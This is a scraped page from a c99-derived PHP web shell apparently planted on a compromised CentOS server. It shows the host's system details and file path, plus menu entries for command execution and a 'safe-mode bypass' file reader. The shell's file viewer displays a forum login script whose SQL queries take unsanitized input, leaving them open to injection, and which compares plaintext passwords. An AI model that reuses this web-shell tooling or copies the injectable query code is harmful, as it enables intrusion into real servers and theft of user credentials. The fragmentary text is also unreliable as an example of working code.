Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/manage_22222/webboard/ drwxr-xr-x |
Viewing file: Select action/file-type: require("config.inc.php"); ?> // ตรวจสอบว่ามี username หรือไม่ mysql_connect($host,$user,$passwd); $sql = "select * from webboard_member where User='$uid'"; $result = mysql_db_query($dbname,$sql); $NRow = mysql_num_rows($result); if($NRow==0) { echo "Error : Username and Password","กรุณาตรวจสอบอีกครั้ง",""; echo " \n"; exit(); } $row = mysql_fetch_array($result); $User = $row["User"]; $Password = $row["Password"]; $Email = $row["Email"]; $ICQ = $row["ICQ"]; $WebName = $row["WebName"]; $URL = $row["URL"]; $Profile = $row["Profile"]; // ตรวจสอบการ login if($action=="login") { if($uid!=$User || $pwd!=$Password) { err_msg("Error : Username and Password","กรุณาตรวจสอบอีกครั้ง",""); } } else { echo "Error : Method","กรุณา Login ก่อนเข้าระบบ","login.php"; } ?> $db = mysql_connect($host,$user,$passwd) or die ("ไม่สามารถติดต่อ database ได้ในขณะนี้"); $topten="select * from webboard_member order by id $order "; $result = mysql_db_query($dbname,$topten) or die ("ไม่สามารถสั่งให้ database ทำงานได้ในขณะนี้"); $NRow = mysql_num_rows($result); if ($NRow==0) { echo "ยังไม่มีสมาชิก"; } while( $arr = mysql_fetch_row( $result ) ) { print " $arr[0]. $arr[1] :email : $arr[3] : "; }; mysql_close( $db ); ?> |
:: Command execute :: | |
:: Shadow's tricks :D :: | |
Useful Commands
|
:: Preddy's tricks :D :: | |
Php Safe-Mode Bypass (Read Files)
|
--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0058 ]-- |